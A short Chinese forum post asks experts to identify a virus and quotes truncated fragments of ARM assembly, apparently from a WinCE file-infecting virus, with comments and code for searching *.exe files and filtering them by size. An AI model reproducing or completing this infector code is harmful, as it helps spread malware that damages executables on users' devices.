请问有人看的懂这个代码吗? 请高手的朋友赐教一二!!
这个不知道是什么病毒的代码,请高手的朋友赐教一二!!
; for finding *.exe files in the current directory. But in this ; case I made a big mistake. I didn't realize that WinCE is not ; aware of the current directory and thus we need to use absolute ; pathnames. That's why this code won't find files in the current ; directory, but rather always in root directory. I found this out when I ; was performing final tests, but because the aim was to crea
adr r0, mask mov r1, r4 mov lr, pc ldr pc, [r11, #-24] ; find first file cmn r0, #1 beq free_wfd mov r5, r0 find_files_iterate ldr r0, [r4, #28] ; filesize high ldr r1, [r4, #32] ; filesize low cmp r0, #0 ; file too big? bne find_next_file cmp r1, #0x1000 ; file smaller than 4096 bytes? addgt r0, r4, #40 ; gimme file na